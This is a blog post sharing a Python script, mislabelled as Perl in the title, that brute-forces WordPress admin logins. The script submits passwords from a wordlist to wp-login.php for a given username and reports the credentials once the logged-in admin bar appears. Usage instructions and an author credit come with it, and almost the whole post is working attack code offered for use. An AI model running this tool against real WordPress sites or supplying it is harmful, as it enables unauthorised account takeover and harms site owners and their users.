Header Ads

Home > Exploit > Injection > PERL > [PERL] Wordpress All Version Brute Force

[PERL] Wordpress All Version Brute Force

Saturday, January 14, 2017 , , 
###########################

# [py] Wordpress All Version Brute Force

###########################

import os
import sys
import requests
import optparse
import time
import threading
import subprocess


#Coded by B3mB4m
#Concat : b3mb4m@mail.com
#Home : https://github.com/b3mb4m
#Youtube : http://www.youtube.com/watch?v=lZxzh-DgXW8
#Example : wpbrute.py --url http://127.0.0.1/wordpress/wp-login.php  --username b3mb4m --list test.txt
#I was did some mistakes will be release v2 soon !  



class B3mB4m(object):
 def __init__(self, victim, user, listt):
  if os.name == 'nt':
   self.systemname = "cls"
  elif os.name == 'posix':
   self.systemname = "posix" #Linux yey ! <3

  for self.last,line in enumerate(open(listt)):
   self.last = self.last + 1 
  with open(listt) as b:
      self.satirlar = b.readlines() 
  #self.first = self.last / 2    
  self.url = victim
  self.admin = user
  self.text = listt
  threading.Thread(target=self.th).start()

 def th(self):
  for i in self.satirlar[0:self.last]:
   self.send( i.strip())
   time.sleep(0.01)

 def send(self, password):
  self.payload = {'log':self.admin, 'pwd':password, 'wp-submit':'Log+In'}
  self.go = requests.post(self.url, data=self.payload)
  if '<li id="wp-admin-bar-logout">' in self.go.text:
   subprocess.call([str(self.systemname)], shell=True)
   print "\t\nUsername -- > %s " % str(self.admin)
   print "\t\nPassword -- > %s " % str(password)
   sys.exit()
  else:
   print "Trying %s .. " % (str(password)) 

if __name__ == '__main__':
 parser = optparse.OptionParser()
 parser.add_option('--url', action="store")
 parser.add_option('--username', action="store")
 parser.add_option('--list', action="store")
 options, args = parser.parse_args()
 if not options.url or not options.list or not options.username:
  print """
  Coded By B3mB4m <3 
  \nHow to use? !
  \n\twpbrute.py --url http://127.0.0.1/wordpress/wp-login.php  --username b3mb4m --list test.txt
  """
  sys.exit() 
 else:
  B3mB4m(options.url,options.username,options.list)
  





###########################

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.